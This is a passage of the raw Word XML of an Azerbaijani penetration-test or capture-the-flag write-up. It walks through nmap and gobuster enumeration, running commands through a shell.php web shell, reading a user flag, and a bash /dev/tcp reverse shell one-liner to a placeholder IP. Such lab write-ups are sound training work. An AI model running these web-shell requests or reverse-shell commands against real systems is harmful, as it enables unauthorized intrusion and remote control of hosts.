          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3402"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
              </w:rPr>
              <w:t>Serv-U SUID binarisi üzərindən root</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri"/>
          <w:b/>
          <w:color w:val="163A63"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>2.1 Host aşkarlanması və xidmət enumerasiyası</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="276" w:lineRule="auto"/>
        <w:ind w:firstLine="340"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Əvvəlcə arp-scan ilə lokal seqmentdə host aşkar edildi. Sonra Nmap ilə 22 və 80 portlarının açıq olduğu, web serverin Apache 2.4.29 olduğu müəyyən edildi.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="276" w:lineRule="auto"/>
        <w:ind w:firstLine="340"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Niyə bu addım seçildi: Hücum zəncirinin ilk mərhələsində hansı hostun aktiv olduğunu və hansı portların açıq olduğunu öyrənmək vacib idi. Bu mərhələ növbəti web enumerasiya addımlarının əsasını qoyur.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="160"/>
        <w:ind w:left="340" w:right="340"/>
        <w:shd w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>arp-scan -l</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="160"/>
        <w:ind w:left="340" w:right="340"/>
        <w:shd w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>nmap -sC -sV &lt;target&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
            <wp:extent cx="5394960" cy="1643388"/>
            <wp:docPr id="16" name="Picture 16"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="Screenshot 2026-04-18 013413.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId25"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5394960" cy="1643388"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="276" w:lineRule="auto"/>
        <w:ind w:firstLine="340"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Lokal şəbəkədə hostun aşkarlanması. Bu ekran test obyektinin IP ünvanını dəqiqləşdirir və sonrakı skanlar üçün hədəfi müəyyən edir.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
            <wp:extent cx="5394960" cy="1618862"/>
            <wp:docPr id="17" name="Picture 17"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="Screenshot 2026-04-18 013847.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId26"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5394960" cy="1618862"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="276" w:lineRule="auto"/>
        <w:ind w:firstLine="340"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Nmap nəticəsi. Burada 22/ssh və 80/http portları görünür; bu isə həm uzaq giriş, həm də web tətbiqi üzərindən hücum səthinin mövcud olduğunu göstərir.</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri"/>
          <w:b/>
          <w:color w:val="163A63"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>2.2 Gizli məzmunun tapılması və web enumerasiyası</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="276" w:lineRule="auto"/>
        <w:ind w:firstLine="340"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>İlkin Gobuster nəticələrində javascript, phpmyadmin, phpinfo.php və robots.txt aşkar edildi. robots.txt içində admin, wordpress, user və shimishao kimi ipucları tapıldı. Daha geniş sözlük və əlavə genişlənmələrlə aparılan ikinci enumerasiya zamanı shell.php endpoint-i aşkar olundu.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="276" w:lineRule="auto"/>
        <w:ind w:firstLine="340"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Niyə bu addım seçildi: Default ana səhifə adətən kifayət qədər məlumat vermir. Buna görə gizli qovluqları, ehtiyat faylları və test endpoint-lərini tapmaq üçün məzmun enumerasiyası aparmaq lazım idi.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="160"/>
        <w:ind w:left="340" w:right="340"/>
        <w:shd w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>gobuster dir -u http://&lt;target&gt;/ -w /usr/share/wordlists/dirb/common.txt</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="160"/>
        <w:ind w:left="340" w:right="340"/>
        <w:shd w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>curl -v http://&lt;target&gt;/robots.txt</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="160"/>
        <w:ind w:left="340" w:right="340"/>
        <w:shd w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>gobuster dir -u http://&lt;target&gt;/ -w &lt;wordlist&gt; -x php,txt,html</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
            <wp:extent cx="5394960" cy="3356544"/>
            <wp:docPr id="18" name="Picture 18"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="Screenshot 2026-04-18 014144.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId27"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5394960" cy="3356544"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="276" w:lineRule="auto"/>
        <w:ind w:firstLine="340"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>İlkin Gobuster nəticələri. Bu görüntü birbaşa görünməyən, lakin hücum üçün dəyərli ola biləcək qovluq və faylları üzə çıxarır.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
            <wp:extent cx="5394960" cy="3214019"/>
            <wp:docPr id="19" name="Picture 19"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="Screenshot 2026-04-18 014217.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId28"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5394960" cy="3214019"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="276" w:lineRule="auto"/>
        <w:ind w:firstLine="340"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>robots.txt məzmunu. Buradakı sözlər potensial istifadəçi adları, tətbiq qovluqları və ehtimal olunan parol siyahısı üçün ipucu rolunu oynayır.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
            <wp:extent cx="5394960" cy="2380899"/>
            <wp:docPr id="20" name="Picture 20"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="Screenshot 2026-04-18 020034.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId29"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5394960" cy="2380899"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="276" w:lineRule="auto"/>
        <w:ind w:firstLine="340"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Genişləndirilmiş enumerasiya nəticəsi. Bu mərhələnin əsas nəticəsi shell.php kimi yüksək riskli endpoint-in tapılmasıdır.</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri"/>
          <w:b/>
          <w:color w:val="163A63"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>2.3 shell.php üzərindən ilkin komanda icrası</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="276" w:lineRule="auto"/>
        <w:ind w:firstLine="340"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Burp Suite Repeater vasitəsilə cmd parametri ilə müxtəlif əmrlər göndərildi. whoami, ls, cat və sudo -l kimi əmrlərlə server tərəfində www-data hüquqları ilə işlədiyimiz, istifadəçi qovluqlarına baxa bildiyimiz və user1.txt bayrağına çatdığımız təsdiqləndi.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="276" w:lineRule="auto"/>
        <w:ind w:firstLine="340"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Niyə bu addım seçildi: Tapılan shell.php endpoint-inin həqiqətən komanda icrasına açıq olub-olmadığını yoxlamaq lazım idi. Bu addım uğurlu olsa, tətbiq səviyyəsindən birbaşa sistem səviyyəsinə keçid əldə edilə bilərdi.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="160"/>
        <w:ind w:left="340" w:right="340"/>
        <w:shd w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>GET /shell.php?cmd=whoami</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="160"/>
        <w:ind w:left="340" w:right="340"/>
        <w:shd w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>GET /shell.php?cmd=ls+/home</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="160"/>
        <w:ind w:left="340" w:right="340"/>
        <w:shd w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>GET /shell.php?cmd=ls+/home/pred8or</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="160"/>
        <w:ind w:left="340" w:right="340"/>
        <w:shd w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>GET /shell.php?cmd=cat+/home/pred8or/user1.txt</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="160"/>
        <w:ind w:left="340" w:right="340"/>
        <w:shd w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>GET /shell.php?cmd=sudo+-l</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
            <wp:extent cx="5394960" cy="2720585"/>
            <wp:docPr id="21" name="Picture 21"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="Screenshot 2026-04-18 020559.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId30"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5394960" cy="2720585"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="276" w:lineRule="auto"/>
        <w:ind w:firstLine="340"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>whoami sorğusu ilə komanda icrasının sübutu. Burada məqsəd endpoint-in sadəcə mətn qaytardığını yox, real shell kontekstində əmr işlətdiyini göstərmək idi.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
            <wp:extent cx="5394960" cy="1738125"/>
            <wp:docPr id="22" name="Picture 22"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="Screenshot 2026-04-18 022741.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId31"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5394960" cy="1738125"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="276" w:lineRule="auto"/>
        <w:ind w:firstLine="340"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>/home qovluğunun siyahılanması. Bu addım mümkün lokal istifadəçiləri müəyyən etmək və hansı hesabların maraqlı olduğunu anlamaq üçün aparıldı.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
            <wp:extent cx="5394960" cy="3256957"/>
            <wp:docPr id="23" name="Picture 23"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="Screenshot 2026-04-18 022838.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId32"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5394960" cy="3256957"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="276" w:lineRule="auto"/>
        <w:ind w:firstLine="340"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>pred8or istifadəçisinin qovluğu. Məqsəd hədəf istifadəçinin ev qovluğuna çıxışımızın olub-olmadığını görmək idi.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
            <wp:extent cx="5394960" cy="1785060"/>
            <wp:docPr id="24" name="Picture 24"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="Screenshot 2026-04-18 022945.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId33"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5394960" cy="1785060"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="276" w:lineRule="auto"/>
        <w:ind w:firstLine="340"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>user1.txt bayrağının oxunması. Bu ekran ilkin girişin praktik dəyərini və artıq fayl oxuma imkanını göstərir.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
            <wp:extent cx="5394960" cy="2067012"/>
            <wp:docPr id="25" name="Picture 25"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="Screenshot 2026-04-18 023043.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId34"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5394960" cy="2067012"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="276" w:lineRule="auto"/>
        <w:ind w:firstLine="340"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>sudo imkanlarının yoxlanması. Buradakı məqsəd privilege escalation üçün asan yolun dərhal mövcud olub-olmadığını yoxlamaq idi.</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri"/>
          <w:b/>
          <w:color w:val="163A63"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>2.4 Reverse shell və lokal enumerasiya</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="276" w:lineRule="auto"/>
        <w:ind w:firstLine="340"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Əvvəlcə netcat listener quruldu, sonra shell.php üzərindən reverse shell payload göndərildi. Shell daxilində whoami, id və uname -a əmrləri ilə istifadəçi konteksti və sistem versiyası toplandı. Daha sonra SUID enumerasiyası aparıldı və /usr/local/Serv-U/Serv-U binarisi diqqət çəkdi.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="276" w:lineRule="auto"/>
        <w:ind w:firstLine="340"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Niyə bu addım seçildi: Burp Repeater üzərindən hər əmri ayrıca işlətmək yavaşdır və interaktiv deyil. Ona görə stabil reverse shell almaq həm rahat enumerasiya, həm də privilege escalation üçün zəruri idi.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="160"/>
        <w:ind w:left="340" w:right="340"/>
        <w:shd w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>nc -lvnp 4444</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="160"/>
        <w:ind w:left="340" w:right="340"/>
        <w:shd w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>bash -c 'bash -i &gt;&amp; /dev/tcp/&lt;IP&gt;/4444 0&gt;&amp;1'</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="160"/>
        <w:ind w:left="340" w:right="340"/>
        <w:shd w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>whoami</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="160"/>
        <w:ind w:left="340" w:right="340"/>
        <w:shd w:fill="F2F4F7"/>
